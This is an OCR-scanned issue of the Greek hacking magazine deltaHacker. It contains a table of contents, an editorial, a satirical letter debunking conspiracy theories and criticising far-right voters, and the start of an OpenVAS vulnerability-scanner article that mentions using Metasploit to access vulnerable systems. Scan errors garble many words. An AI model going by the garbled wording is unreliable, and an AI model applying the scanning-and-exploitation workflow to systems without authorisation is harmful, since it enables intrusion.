Γνωρίστε κι ερωτευτείτε τη MySQL 
Καλωσορίστε το Namecoin και τα dot-bit domains 
_ Δημιουργήστε µια lean, mean, vuln-scanning machine 
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Συσσωρευμένες υποχρεώσεις, υπεραισιόδοξος προγραμματι- 

σμός και παρασκηνιακές εργασίες για TO κοντινό μέλλον, προ- 

καλούν ένα ατύχημα και µας κάνουν να συνειδητοποιήσουμε, 
επιτέλους, τι εἶναι αυτό που θέλει το περιοδικό deltaHacker. 
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Γιατί ο Θείος Ακάκιος στέλνει τις επιστολές TOU 
*OE αυτό” το περιοδικό; 


Όσοι έχετε ἤδη παρακολουθήσει το deltaCast 902601, 
σίγουρα υποψιάζεστε σε τι αναφέρεται ο τίτλος: O KU- 
νηγός εἶναι το OpenVAS και οι αδυναμίες που ψάχνει 

Ki εντοπίζει αφορούν σε συστήματα και υπηρεσίες. 


ano το δίκτυο του Namecoin! 


Με To Bitcoin ἔχουμε ασχοληθεί αρκετές φορές και θα 
μπορούσαμε να πούμε ότι κοντεύουµε να το βαρεθούμε, η 
αλήθεια ωστόσο εἶναι ότι το αγαπάμε ακόµα. Σε µια πρόσφατη 
ηλεκτρονική περιπλάνηση, πέσαμε πάνω στο Namecoin... 
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Στο πρώτο άρθρο της νέας µας σειράς καταφέραμε να 
προβάλουµε κείµενο σε µία οθόνη, συνθέτοντας σῆμα VGA. 
Αυτή τη φορά θα προχωρήσουμε ένα βήμα παραπέρα: Θα 

κατασκευάσουµε ένα βελτιωμένο κύκλωμα, το οποίο θα µπορεί να 
προβάλει χρώματα και γραφικά. 


OpenVAS server, 
yia aveta vuln scans εξ αποστάσεως 


Φτιάχνουμε ένα εξειδικευμένο box ή VM, ικανό v' αποτελέσει µια 
ευέλικτη πλατφόρμα ελέγχου της ασφάλειας των δικτύων που 
διαχειριζόμαστε! 


Web development σε περιβάλλον LAMP 
[μέρος 5] 


Πίσω από ro τρίτο κατά σειρά γράμμα rou ακρωνύμιου LAMP, 
βρίσκεται η βάση δεδοµένων MySQL. Με τη βοήθειά της 
μπορούμε να αναπτύξουμε ασφαλείς, ταχύτατες και μεγάλης 
έκτασης εφαρμογές. 


The IBAN-application inci 


Δεν έχει περάσει ούτε μῆνας, όταν o ασφαλιστικός φορέας για 
το προσωπικό τραπεζών έκανε µια µεγάλη γκάφα. O φορέας διέ- 
VEIE στα µέλη του µια εφαρµογή για Windows, µέσω της οποίας 

θα δήλωναν διάφορα προσωπικά δεδοµένα, όπως αριθµό ταυ- 


τότητας, αριθµό λογαριασμού (σε µορφή ΙΒΑΝ) κ.λπ. Όλα καλά, 
OVO που η συγκεκριµένη εφαρµογή ήταν εντελώς τρύπια :/ 


Metasploit και OpenVAS: 
Συνάντηση κορυφής! 


To Metasploit Framework είναι η κατεξοχήν πλατφόρμα για 
pen-testing και post exploitation, ενώ το OpenVAS αποτελεί µια 
αξιόλογη λύση για TOV εντοπισμό και την ανίχνευση αδυναμιών 
σε συστήματα. Θα ήταν το λιγότερο παράξενο, αν αυτές οι δύο 

εφαρμογές δεν συνεργάζονταν. 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 
Αρχισυντάκτης Παναγιώτης Βαρελάς 
Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 


Σύνταξη Παναγιώτης Βαρελὰς, Χρήστος Βαρελάς, Ανδρέας 
Βενιέρης, Γιώργος Γιάννου, Μανώλης Κιαγιάς, Ιωάννης 
Κονιάρης, Πέτρος Κυλαδίτης, Γιώργος Μελέκος, Νίκος 
Μουρατίδης, Νικόλαος Σηφάκης, Μέσος Παπαδόπουλος 
(TM), Χρίστος Τόμπρας 


Γραμματική επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


To ηλεκτρονικὀ περιοδικὀ deltaHacker εἶναι συνδρομητικό και εκδίδεται and την Para- 
bing Creations δώδεκα φορὲς το χρόνο, κάθε μήνα. H Parabing Creations έχει την έδρα 
της στη Μαιώτιδος 3, 55133, Καλαμαριά. O δικτυακὀς τόπος του περιοδικού εἶναι στο 
http://deltahacker.gr. Το email επικοινωνίας εἶναι το talk2us@deltahacker.gr και ειδικἁ 
για τις συνδρομές εἶναι ro subscriptions@deltahacker.gr. Οι γενικές πληροφορἱες για τις 
συνδρομές παρατίθενται στο http://deltahacker.gr/subscriptions και οι ἰδιες οι παραγγελίες 
γίνονται ano ro http://deltahacker.gr/pdfi2order. Όλες οι απόψεις που εκφράζονται στα 
ἆρθρα δεν εκφράζουν απαραίτητα και τη γνώμη του περιοδικού. 


(*) deltaCast «02661 | OpenVAS vScanner 
http://deltahacker.gr/deltacast-s02e01 
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Στη 3η χρονιά και συνεχίζουμε ακάθεκτοι! 
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Μηνιαίο περιοδικό deltaHacker, http://deltahacker.gr 


Ethical Hacking / Δίκτυα / Ασφάλεια / Προγραμματισμός / Ηλεκτρονικά 
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Συσσωρευμένες υποχρεώσεις, υπεραισιόδοξος npoypappati- 
σμὸς και παρασκηνιακἑς εργασἰες για το KOVTIVO μέλλον, προκα- 
λούν éva ατύχημα και µας κἄνουν να συνειδητοποιήσουμε, επι- 
τέλους, τι εἶναι GUTO που θέλει το περιοδικὀ deltaHacker. 


by subZraw 


Θα γνωρίζετε ἴσως την αμερικανικής προελεύσεως φράση "λέμε µια 
ιστορία". Τις προάλλες, n.x., ἄκουγα τον Leo Laporte v' αναφέρει Ori, 
στο δίκτυο video casting που ἐχει, "λένε µια ιστορία". Στην πραγµματικὀ- 
τητα, αυτὸ που κάνουν στο εν λόγω δίκτυο εἶναι να προσφέρουν διάφο- 
pa shows nepi Windows, security, hardware, ἄλλα µε οδηγούς αγοράς, 
σχολιασμό των τεχνολογικών εξελίξεων της εβδομάδας κ.ο.κ. Τι µπορεί 
να σημαίνει, λοιπόν, αυτό το "λέμε µια ιστορία"; H ἴδια φράση ακούγεται 
βεβαίως και σ' ἄλλους χώρους, ὀπου συχνὰ καταλαβαίνουμε OT! χρησι- 
μοποιεῖται για καθαρά επικοινωνιακοὺς λόγους και στερείται οποιουδἠ- 
ποτε νοήματος. Ορισμένοι πολιτικοί µας, για παράδειγµα, £xouv πιάσει 
TO κὀλπο και τους ακούς va λένε Ori ο δεἰνα φορέας ἡ το τάδε κόμμα "δεν 
ἐχει να προσφέρει µια αφἠγηση", οπὀτε να µην τους εμπιστευόμαστε. Av 
το σκεφτείτε λἰγο, θα δείτε ότι η "αφήγηση" εἶναι εκείνη η "ιστορία"... 


Αγαπητὲς κι αγαπητοί, στον αέρα TIVAXTNKE ο προγραμματισμός του 
τεύχους 027, μ' αποτἑλεσμα οι φίλοι και συνδρομητές να το λάβουν κα- 
θυστερημένα :S Ευθὺς εξ αρχής, σημειώνω εμφατικὰ ὁτι TO φταίξιμο 
βαραίνει τον γράφοντα και μόνον εκείνον. Ti να σας πρωτολέω, τώρα.. 

Μαζεύτηκαν πολλὲς "εξωσχολικὲς" υποχρεώσεις τον Ιανουάριο. Δου- 
λειὲς κι αγγαρεἰες nou εκ πρώτης ὀψεως δεν φαίνονται σπουδαΐες, μόνο 
που στην πράξη ροκάνιζαν συστηµματικἁ το διαθέσιμο χρόνο. Υπήρχε 
ano την ἄλλη κι εκείνη η υπεραισιοδοξία, η οποία αρχίζει va σε κυριεύει | 
στην αρχἡ κάθε µήνα και κορυφώνεται λίγο μετά το πρώτο δεκαήμερο, 
πριν αρχίσει να υποχωρεί (στην αρχἠ σταδιακἀ, ano Eva σηµείο και μετὰ | 
σαν να κουτρουβαλάει σε µια απότομη nAayid rou Eyjafjallajökull, τη 
στιγμή nou το ηφαίστειο αποφασίζει να ξυπνήσει για ἄλλη µια φορά). 
Εἶναι το διάστηµα κατά το οποίο ειλικρινά πιστεύεις πως OX! μόνο θα Ta 
προλάβεις όλα, αλλά θα μπορέσεις να κάνεις και πολλά περισσότερα. 


Καταπιάνεσαι, Aoinóv, µε την προετοιμασία και την παραγωγἠ του 1ου επεισοδίου 
της 2ης σεζὀν Tou deltaCast (εντελώς τυχαίο παράδειγµα), το οποίο αφορά στο 
OpenVAS. Εἶσαι στην αρχἠ του µήνα ακόµα, οπότε όλα κυλούν ομαλά, η ζωή εἶναι 
ωραία και napa τις ὀποιες αντιξοότητες και δυσκολἰες!, αντιµετωπίζεις τα πάντα 
µε αισιοδοξία. Κι εκεἰ που εἶναι σχεδὀν ἑτοιμο το επεισόδιο, σκἐφτεσαι ότι γι' AUT 
την ιστορία που λες: δεν σου φτάνει μιάμιση opa για τη διηγηθεἰς μέχρι τέλους. 
Αποφασίζεις, λοιπὀν, να ἐχεις και σχετικὀ άρθρο στο VEO τεύχος του περιοδικού, 
το οποίο ούτως ἡ ἄλλως εἶναι κι GUTO UNO προετοιμασία. Βγάζεις λοιπὸν κάποια 
στιγμή το επεισόδιο στο αἐρα (µέσω rou site) και καταπιάνεσαι μ' εκείνο ro άρθρο. 
Μαντέψτετι γίνεται: Μπορεί οι μέρες να περνάνε, ωστόσο η ιστορἱα που ξεκἰνησες | 
να λες µε ro deltaCast και τώρα τη συνεχἰζεις µε το άρθρο για το περιοδικὀ, σου 
ζητάει κι ἄλλο χώρο. Δεν σου κἀνει καρδιὰ να της αρνηθεἰς, οπὀτε αποφασίζεις 
ν' αφιερώσεις μεγάλο μέρος του τεύχους στο OpenVAS (μα, εἶναι συναρπαστικὸ, 
ειδικἁ όταν συνδυάζεται µε TO Metasploit). Το Eva άρθρο, λοιπὀν, καταφέρνει να 
— γίνει ὀχι δύο, αλλά rpia άρθρα... 


Re Παράλληλα μ' αυτά, εδώ και kaipó ἐχει ξεκινήσει κι Eva GAAO πρὀτζεκτ, για 
το onoio θα μιλήσουμε για πρώτη φορά τώρα, εδώ, σ' αυτή την τελευταία ενότη- 
τα TOU editorial. Που λέτε, η αλήθεια εἶναι ὁτι έχουμε συνειδητοποιήσει πως TO 
deltaHacker πράγματι λέει µια ιστορία. Στην πραγματικότητα βέβαια δεν εἶναι pia | 
αλλά πολλὲς ανεξάρτητες ιστορίες, οι οποίες όμως όλες περιστρέφονται γύρω 
ano τους ἰδιους βασικούς ἄξονες και κινούνται προς την ἰδια κατεύθυνση. Σε 
γενικὲς γραμμές, λοιπὸν, δικαιούμαστε να μιλάμε για uia ιστορία. Εἶναι η ιστορἱα 
ανθρώπων --ὀχι κατ' ανάγκη συνεργατών TOU περιοδικού-- οι οποίοι αγαπούν την 
τεχνολογἱα και συχνά τους αρέσει περισσότερο να παἰζουν λύνοντας προβλήματα, 
* παρά va χρησιμοποιούν πράγματα που δουλεύουν τέλεια. Εἶναι οι ἄνθρωποι nou, 
χωρἱς va ro ἐχουν προαποφασίσει και χωρὶς φυσικἀ να κινούνται βάσει σχεδίου, 
καταφέρνουν διαρκώς να µας δείχνουν στην πράξη OT! το χάκινγκ δεν εἶναι μόνο 
για χαρακτήρες-καρτούν, αλλά για κἆθε ἄνθρωπο που του αρέσει va σκαλἰζει και 
να μαθαίνει. Νομίζετε ὁτι εἶμαι λίγο περισσότερο ποιητικὸς απ' Ooo θα ἐπρεπε; 
Εγώ πάλι νομίζω πως ὀχι. Ρωτήστε av εἶναι το Μανώλη, το Γιώργο, τον Πέτρο ἡ τον 
Παναγιώτη. Av δεν τους γνωρίζετε προσωπικἁ, δείτε τα θέματα µε ra οποία KaTa- 
πιάνονται και πολὺ συχνὰ γράφουν γι’ αυτά στο περιοδικὀ. Τι τα θέλετε, χωρὶς καν 
να το πάρουμε εἰδηση, ὅπως µου αρέσει να λέω, 28 μήνες μετὰ την κυκλοφορία 
του deltaHacker 001, ἐχουμε πια καταλάβει ὁτι το περιοδικὀ διηγείται, σχεδὸν 
ano μόνο του, µια ιστορία. Πλέον μάλιστα δεν κρατιέται και θέλει να την πει και 
παραέξω. Στο εξωτερικὀ. Παντού. Π' αυτό και µας ἐβαλε, αρχικά τη Σύμβουλο 
Εκδόσεως (TM), τον DTP Guy (TM), τον κο Αρχισυντάκτη (TM) και τον yours 
truly (aka ο Προκομμένος Mac (TM)), να εργαζόµαστε yia την προετοιμασία της 
αγγλικἠς εκδοχἠς του. Στην EWC ropa πορεία µας, εννοεἰται πως δεν θα τα εἰχαμε 
καταφέρει χωρίς τη στἠριξἡ σας. Σε λίγους µήνες, λοιπὸν, ὀπου ευελπιστούμε ὁτι 
η αγγλική ἐκδοση θα "ναι ἐτοιμη για τον πλανήτη ολάκερο, σε ὁλους τους συνδρο- 
μητέὲς rou deltaHacker θα δώσουμε δωρεὰν πρόσβαση για ἐναν χρόνο *kai* στη 
νέα, διεθνἠ ἑκδοση. Ταυτόχρονα, ro storytelling θα συνεχίζει και στα Ελληνικάἁ, 
όπως το έχετε γνωρίσει μέχρι σήμερα, προσπαθώντας διαρκώς να βελτιώνεται και 
να γίνεται περισσότερο συναρπαστικὀ. 


Αυτά προς το napov. 


1. Ὅλοι στο ἰδιο Σύμπαν ζούμε, οπότε καταλαβαίνετε σε τι μπορεί ν' αναφέρομαι. 
2. Καλώς την! 


OVELA peur 


Αγαπητοί µου, 

Όλα έδενχναν OTL η HEPA µου επρόκειτο σήµερα να χυλήσεν ήρεμα. 

Καθισμένος στην τραπεζαρία είχα ετοιμάσει καφέ, είχα βγάλει όλα µου 
τα χαρτιά καν είχα ανοίξει μπροστά µου τη, γραφομηχανή.Λίπλα. μου η εξα- 
δέλφη µε το λάπτοπ της. Δαν 

"Να σας συμπληρώσω πράσινο τσάι;"ακούδτηκε η μητέρα της εξαδέλφης 
απὀ την κουζίνα. 3 

"Καφέ πίνουμε" της φώναξα εγώ. 

Εμφανίστηκε στην πόρτα, κρατώντας κάτι φακελάκνα. "Έχω πάρει αυτό 
εδώ, πράσινο τσάν µε αγνουβερδικά βότανα. Σίγουρα δεν θέλετε»" 

"Όχι, OX". 

Κοίταξε προς το µέρος μου καλοσυνάτα.'Ἡ γραφομηχανή της Κυρίας Kal— 
της εἶναι αυτή»" ρώτησε. "Tv γράφειο»" 

Αμέσως ένονωσα να ανάβουν λαμπάκια κννδύνον. Έξερα πως έπρεπε να ci- 
μαν προσεκτικός. 

"Να, την επιστολή µου γράφω. Που γράφω κάθε μήνα." 

"A, VÆL ναν. Ον επιστολές, ναι.Ενδιαφέρον." 

Γνα λίγο μείναμε σνωπηλοί. 

"Καν γράφεις ακόµα για πολυτυκά1"ξανάρχισε η μητέρα της εξαδέλφης 
που είναν Ινδουίστρνα."Αχόμα va σε βαρεθούν»" 

"Μα τι λέτε; Πότε έγραφα εγώ για MOALTLHGS" διαμαρτυρήθηκα pe τρόπο 
καθόλου πειστικό. 


Νε κοίταξε καλοσυνάτα HAL επέστρεφε στην κουζίνα χωρίς να πει τίποτα. 
Δίπλα μου, η εξαδέλφη exe σηκώσει το κεφάλν της απὀ το λάπτοπ και µε 
ποίταγε ερωτηματικά. 

"Tv θα πεν, 'πότε έγραφα εγώ YLA πολιτικά'»" μον λέει. "Γράφεις καν γνα 
τίποτα άλλο; Μόνο για πολιτικά γράφεις. Κι εγώ απορώ πώς συνεχίζουν va 
σε ανέχονται. Χάκερ, σον λέεν μετά." 

"Μα τι λες}" επέµεινα εγώ. "Tv γράφω για πολιτικά} Γράφω για κόμματα: 
Γράφω για βουλευτές; Γράφω για σκάνδαλα»" 

"Γνα τα χρυσά αβγά δεν ypapercs" 

"Να δεν είναν το ἴδιο. Εγώ γνα την Ελλάδα γράφω, γνα την ελληνική KOL— 
νωνία. Καν τα χρυσά αβγά εἶναι δείγμα της κατρακύλας που έχουµε πάρει. 
Ως κοινωνία. Αυτό µε απασχολεί." 

"Παίζεις pe τις λέξεις νομίζω." 

"Καθόλου δεν παίζω. Δηλαδή, αν το πάρουμε έτσι, την άλλη φορά που 
έγραφα για την τεχνητή νοημοσύνη, τν έκανα τότε, YLA κομπιούτερ έγραφα; 
Όχν βέβανα. Από πομπνούτερ δεν έχω OVTE ιδέα οὔτε γνώμη. Δεν µε ενδιαφέ- 
PEL καν να αποκτήσω. Γνώμη yla την τεχνητή νοημοσύνη όμως έχω." 

"Δεν ξέρω..." 

"Μα vau! Άλλο πράγμα ον υπολογιστές, µε την έννονα του τάδε τσιπακιού 
της nVidia ἡ των προδιαγραφών του USB 5.0, και άλλο πράγμα το πλέγμα 
των εννονών µε τις οποίες προσεγγίζεται το ερώτημα της τεχνητής νοηµο- 
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σύνης, καν η συζήτηση για την φιλοσοφική θεμελίωση αυτών των εννοιών." 

"Έστω! Παρόλα αυτά χωρίς κομπιούτερ τεχνητή νοημοσύνη δεν θα εἰχαμε, 
θα elyapes" 

"Καλά, καν που έχουμε κομπιούτερ, τεχνητή νοημοσύνη δεν έχουμε", της 
είπα εγώ γελώντας. "Ούτε καν θα αποκτήσουμε. Δεν µε διαβάζεις προσεκτυ- 
κά. θα σε επιπλήξω." 

"Άντε απὀ εδώ", είπε γελώντας καν η εξαδέλφη. "Κάθομαι καν σου μιλάω 
στα σοβαρά xv εσύ κάνεις πλάκα." 


Αγαπητοί µου, 


H pépa είχε ξεκννήσει καλά, παν ήμασταν µια χαρούμενη παρέα. Αλλά κπα- 
μνά φορά η πολλή χαρά δεν κάνει καλό. TL αυτό ας εξηγηθώ. 

Σας έγραφα την άλλη φορά για τους μπούφους που πάνε και φηφίζουν 
τους αβγούς και τους φίλους τους. Σας έλεγα OTL όσον μπούφον και να βρε- 
θούν να τους φηφίσουν, η εγκληματικότητα της συγκεκρυμένης συμμορίας 
(των αβγών) οὔτε αποκρύπτεται ούτε νομιμοποιείταν.Κατέληγα στο συμπέ- 
ρασμα πως ον αβγοί πρέπεν να απαγορευτούν. 

Όμως το θέµα των μπούφων παραμένει. 

To να βγαίνει ένας κάπονος,οποιοσδήποτε, και να νσχυρίζεταν OTL έννοι- 
ες όπως αυτή της φυλετικής παθαρότητας ἡ της αδιάσπαστης, διαχρονικής 
συνέχενας του ενός ἡ του άλλον έθνους, είναι έννοιες EYKUPEG, πειστικές, 
θεμελιωμένες, καν επαρκείς γνα την κατανόηση των ιστορυκών, ποινωννκών T) 
οικονομικών φαινομένων, εἶναι ένα ζήτημα. ΔΛικαίωμά τον να το πιστεύει, TL 
ζόρν τραβάωγΚανένα. Αυτός πιστεύειν ὁ,τι θέλει να πιστεύειν χι εγώ πιστεύω 
OTL εἶναι αδαἠς και βλάκας. Mia του καν pla pov. 


Όταν όµως βλέπεις OTL στην σηµερινή Ελλάδα υπάρχεν ένα ποσοστό αν- 
θρώπων --πόσο: 7, IC, 15 τοις εκατό: δεν ξέρω-- που χάνουν τα στραβά 
μάτια στα όπλα, τις σβάστικες, τα μαχαιρώματα, τους εκβιασμούς καν τα 
λοιπά, καν σου μιλάνε για τον ελληνισμό καν τους εχθρούς του, καν για 
τους μετανάστες που φταίνε για όλα, τότε οφείλεις να προβληματιστείς. 


Πού βρέθηκαν όλοι αυτοί; Tv τους παρακινεῦ Γιατί κάνουν πως δεν βλέ- 
πουν; Μήπως δεν βλέπουν πράγματι; 


Καν µετά κοντάς πιο δίπλα καν βλέπεις OTL ἄλλου τόσοι θεωρούν αρκετά 
πιθανόν ὀτυυπάρχεν κάπονος που θέλει να µας ᾠεκάζει. 


Τότε δεν αρκεί ο προβληματισμός. Οφείλεις να ανησυχήσεις βαθιά. 
Tv βαθιά; Βαθύτατα. 


Οφείλεις να αρχίσεις να αναρωτιέσαν. Πώς φτάσαμε μέχρν εδώ; Όλον 
μπούφον είναι» Μας τέλενωσαν ον άλλον» Tv πίνουνε, ληγμένο γάλα πίνουνεΣ 
Μήπως πράγματι τους φεκάζουν; 
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Καν τώρα; Tv κάνουμε τώρα; Tv μπορούμε να κάνουμε; Προλαβαίνουμε; 

Ῥωτάω, αγαπητοί μον, αλλά δυστυχώς, το βλέπετε, η ερώτηση civar py- 
τορική, καν την απάντηση την ξέρω. 

Δεν μπορούμε να κάνουμε τίποτα. Δεν προλαβαίνουμε. To έχουμε χάσεν 
το ποιχνίδν, 

Ον ᾠεκασμοί ἡ η φυλετική καθαρότητα των εθνών δεν είναν απλές ιδέες µε 
τις οποίες µπορεί κανείς να συμφωνήσει ἡ να διαφωνήσει. Δεν τίθεται θέµα 
επνχειρηµατολογίας και καλόπιστης Ἀρντικής. 

Ον άνθρωπον που τις κρατάνε σαν παντιέρες (ἡ σιδερογροθιές) δεν κατέ- 
ληξαν να τις πιστεύουν έχοντας εξετάσει όλες τις άλλες νδέες, HAL έχοντάς 
τες (εκείνες) απορρίφὀεν επειδή τους φάνηκαν ανεπαρκείς. 


TLG πιστεύουν επειδή αποφάσισαν να τις πιστέφουν. 


Elva. θυµωμένον καν ανήµπορον. Φοβούνταν. Καν τέτονες ιδέες προσφέ- 
POLV ασφάλεια, περηφάνεια, στόχους και σιγουριά. 

Κνρίως προσφέρουν έναν εχθρό. Tov περιγράφουν. Τον κάνουν στερεότυ- 
πο. Μας τον δίνουν μασημένο Χαν έτονμο.Τον πατονοµάζουν. Ξέρουμε πλέον 
ποιόν να μισήσουμε. 

Αγαπητοί μου, 

Στα ζητήματα αυτά έρχομαι HAL επανέρχομαι για έναν απλὀ λὀγο.Αυτός 
είναν πως παίρνω στα σοβαρά τους στόχους του περιοδικού τούτου που µου 
κάνει την τιμή να φιλοξενεί τις επιστολές µου στις σελίδες του. 

θα μου επιτρέφετε, ελπίζω, να υποκύφω χι εγώ στην γοητεία ενός στερε- 
ότυπου. 

Από χάκυνγχ ξέρω λίγα. Ον εξελίξεις τρέχουν πιο γρήγορα απὀ όσο µου 
χρειάζεται για να ενημερωθώ και να καταλάβω” θέλοντας και µη, έχω µείνεν 
πισω.θέλω να πιστεύω, λοιπόν, OTL αν κάποιος σήμερα ενδιαφέρεται για το 
χάκινγκ,δεν µπορεί παρά να εἶναι φιλέρευνο και άφοβο πνεύμα, καν OTL ως 
τέτοιο δεν μασάεν κοντόχορτο. 


Εξαιρέσεις, φυσικά, υπάρχουν και θα υπάρχουν για πάντα. Το κοντόχορ- 
το, βλέπετε, είναν νόστυμο HAL εθιστικὀ. Γοητεύεν πολλούς. Αλλά, ελπίζω όχι 
όλους. 


Αυτό είναν το στερεότυπὀ μον. Γράφω, λοιπόν, και ξαναγράφω, αγαπητοί 
μου, για να σας παρακινήσω. 

Αν σας αρέσει καν έχετε την υπομονή να αποσυναρμολογείτε- 
πακετάκνα ICP μαζί µε τον πρωινό σας καφέ καν την μαρμελάδα, 
doyourselvesafavour. 

Την ENOPEVN φορά που κάποιος θα σας προσφέρει κάπονα ETOLLN καν 
"ανταπόδευκτη" αλήθεια, όπως, π.χ., OTL µας Φεκάζουν µε αλουμίννο yra να 
µας υποτάξουν, ἡ OTL ο ελληνισμός "εἶναι το μεγαλύτερο εμπόδιο στην πα- 
γκόσμια δικτατορία" (whateverthatmeans), ή ότι "απόρρητη έκθεση" της 
Μοσάντ φανερώνει τα κρυφά σχέδια του "εβραιομασόνου" Κίσινγκερ κατά 
του Ελληνισμού, ἡ OTL ο Μπιλ Γκέντς éxev χαρακτηρίσει την ελληνική γλώσσα 
"γλώσσα των προηγμένων υπολογιστών" (whateverthatmeans), κ.λπ. κ.λπ. 
ete) --- 


Την επόμενη φορά, λοιπόν, πον θα σας σερβίρει κανείς pla τέτοια µπα- 
ρούφα, µην την φάτε. Πάρτε την, βάλτε την κάτω καν αποσυναρμολογήστε 
την. Κόφτε την φέτες. Όπως ακριβώς θα κόβατε φέτες κάποιο malware yia 
να δείτε πώς δουλεύει. 


To µόνο εργαλείο πον σας χρειάζεται είναν ένα ξυράφι. 
To Evpapr του Όμκαμ. 
(Pxovyw vt!) 


Σας ασπάζομαν, 
θείος Ακάκνος 


- Ὁ O σόι 
c dehahacket.9. ο 
eres - 


η d 
σσ 


προφίλ at 
τρισ GA περιοδικό ~ νέοτεύχος netcasting ~ νέο επεισόδιο slash ~ addenda 
box 


moot deltaCast s02e01 | OpenVAS 
vScanner 


Posted by su 21/01/2014, 18:17 | Published in 


To OpenVAS είναι µια εντυπωσιακή πλατφόρμα Ελεύθερου 
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Πλήρη άρθρα που συμπληρώνουν το περιοδικό [addenda]. To video 
podcast [netcasting > deltaCast episodes]. Άρθρα που µας 
ήρθε να γράψουμε, έτσι, απλά [slash >  /dev/random]. Ta npo- 
κλητικά mind hacks. Τα βίντεο από τα προηγούμενα live streams 
[netcasting > deltaStream]. Ολόκληρα blasts from the past 
[slash > var/backup/old]. Ta πάντα ενδιαφέροντα forums. To 
σηµείο συνάντησης yia τους φίλους του περιοδικο 


deltahacker.gr 


Αληθινό, διασκεδαστικό i για όλο 


mind hacks fora ~ 


Πίνακας Ελέγχου 
Προφίλ στα forum 
Διαχείριση λογαριασμού. 
Αποσύνδεση 


Ωδιαφέροντα (η γνώση. 
Ἠμερορηνία: 31/01/2014 


subZraw στο deltaCast «02401 | OpenVAS. 
vScanner 


Πίνακας Ελέγχου 
Προφίλ στα forum 
Δισχείριση λογαριασμος, 

Αποσύνδεση 


Ι MetaSent ials OM Pme dehaCast sazeo: | openyag 


Skill: Intermediate 
Tags: OpenVAS, vulnerabilities, vulns, scanner, NVI, Kali, setup, configuration 


Ἕνας πανίσχυρος κυνηγὸς αδυναμιών, ano κοντὰ 


Ὅσοι ἐχετε ἤδη παρακολουθήσει ro deltaCast s02e01, σίγουρα υποψιάζεστε 
O£ TI αναφέρεται o τίτλος: O κυνηγὀς εἶναι το OpenVAS και οι αδυναμίες 
που ψάχνει κι εντοπίζει αφορούν σε συστήματα και υπηρεσίες. Για ónoiov 
ασχολείται —£oro και περιστασιακά-- µε την ασφάλεια, οι αναφορές που 
παράγει η εφαρµογή αποδεικνύονται ενδιαφἐρουσες, συχνὰ κι εξαιρετικά 
κατατοπιστικὲς. Το γεγονός μάλιστα ότι μιλάμε για µια δωρεάν πλατφόρμα 
που δεν ἐχει σε τίποτε να ζηλέψει ano ἄλλες, πανάκριβες εμπορικὲς 
προτάσεις, θεωρούμε ότι καθιστά το OpenVAS ιδιαίτερα ελκυστικὀ. Ελάτε va 
γνωρίσουμε anó κοντὰ τη λογικἠ του, αλλά και να το προετοιμάσουμε ὥστε 
να δουλεύει σωστά στο αγαπημένο λειτουργικὀ pen-testing και hacking ὅλων 
μας: ro Kali Linux. Αλλά µη νομίζετε ὅτι θα αρκεστούµε μόνο o' αυτά... 


Ένας πανίσχυρος κυνηγός αδυναμιών, από κοντά 
| 


Το τεύχος nou ropa διαβάζετε εἶναι αφιἐρωμένο oro vulnerability scanning, μέσα 
ano την πλατφόρμα rou OpenVAS (http://openvas.org). To αφιἐρωμά µας εκτείνεται 
κι εκτὸς του περιοδικού. lia την ακρἰβεια, στο πρώτο επεισόδιο της δεύτερης σεζὀν 
του deltaCast, το οποίο μπορείτε να παρακολουθήσετε στο http://deltahacker. gr/ 
deltacast-s02e01, κάνουμε µια ομαλή εισαγωγἠ στις δυνατότητες της πλατφόρμας 
και φυσικά µια επἰδειξη των δυνατοτήτων της. H ὀλη παρουσίαση γίνεται ano TO 
περιβάλλον του BackBox Linux. H συνέχεια του επεισοδίου βρίσκεται στο napov 
τεύχος, Ónou μέσα απὀ τρία σχετικἁ ἆρθρα εξηγούμε, δείχνουμε και συζητάμε για 
τα ακόλουθα. 


1. Αρχιτεκτονικἠ του OpenVAS, τα Network Vulnerability Tests και η σωστή 
προετοιμασία της πλατφόρμας, WoTE va δουλεύει σωστά στο Kali Linux 
(το ἀρθρο nou ropa διαβάζετε). 


2. Δημιουργία ano την αρχἡ ενὸς box/VM µε Debian σε ρὀλο OpenVAS server, 
στον οποίο θα μπορούμε να συνδεόµαστε anó ὀποιον υπολογιστή θἐλουµε 
--ακόμη KI av εἰμαστε εκτὸς τοπικού δικτύου-- και να ξεκινάμε vulnerability 
scans ἡ να παίρνουμε Ππλἠήρεις αναφορές ano τα ἠδη ολοκληρωμένα 
(το άρθρο αρχίζει ano τη σελίδα 42). 


3. Συνεργασία Metasploit και OpenVAS. Συνδεόμαστε and το Metasploit στον 
OpenVAS server, τον onoio φτιάξαμε ακολουθώντας τις οδηγἰες του προηγού- 
μενου άρθρου. Εκτελούμε vulnerability scans, εισάγουµε τα αποτελέσµατα 
στη βάση του Metasploit και στη συνέχεια προσπαθούμε να πάρουμε πρόσβα- 
ση σε ευπαθἠ συστήματα (ro ἀρθρο αρχίζει ano τη σελίδα 78). 


Αρχιτεκτονική, υπηρεσίες και πρωτόκολλα επικοινωνίας 


To OpenVAS δεν εἶναι uia μόνο εφαρµογἠ. Στην πραγματικότητα πρὀκειται για Eva 
σύνολο εργαλείων και υπηρεσιών (services), οι οποίες επικοινωνούν μεταξύ τους 
μέσω διαφόρων πρωτοκόλλων και πάντα κρυπτογραφημένα. H ανίχνευση aduva- 
piov γίνεται µε τη βοήθεια των λεγόμενων NVTs (Network Vulnerability Tests), τα 
οποία ενημερώνονται τακτικἀ και στην ουσία υποβάλλουν τα UNO εξέταση συστή- 
ματα σε διάφορες δοκιμασίες κι ελέγχους, µε στὀχο την αποκάλυψη αδυναμιών σε 
ρυθμίσεις, σε υπηρεσίες κ.ο.κ. Για τον τελικὀ χρήστη, βέβαια, το OpenVAS µπορεί va 
θεωρείται ως µια ενιαἰα εφαρµογή, στην οποία συνδέεται µέσω του αγαπημένου του 
web browser και ξεκινά ελέγχους ἠ/και παΐρνει αναφορές. Όπως προείπαμε, ὁμως, 
η πραγματικότητα εἶναι λιγο διαφορετικἠ. Av θἐλουµε να κατανοήσουμε τη λογική 
του αρχιτεκτονικού οικοδομήματος που ονομάζεται OpenVAS, τότε οφείλουμε να 
γνωρίσουμε καθεμία ano τις υπηρεσίες που το αποτελούν, καθὼς και μερικὰ βασικἀ 
εργαλεἰα και clients. 


€ OpenVAS Scanner (openvassd). Εἶναι η υπηρεσία που κάνει όλη τη δύσκολη 
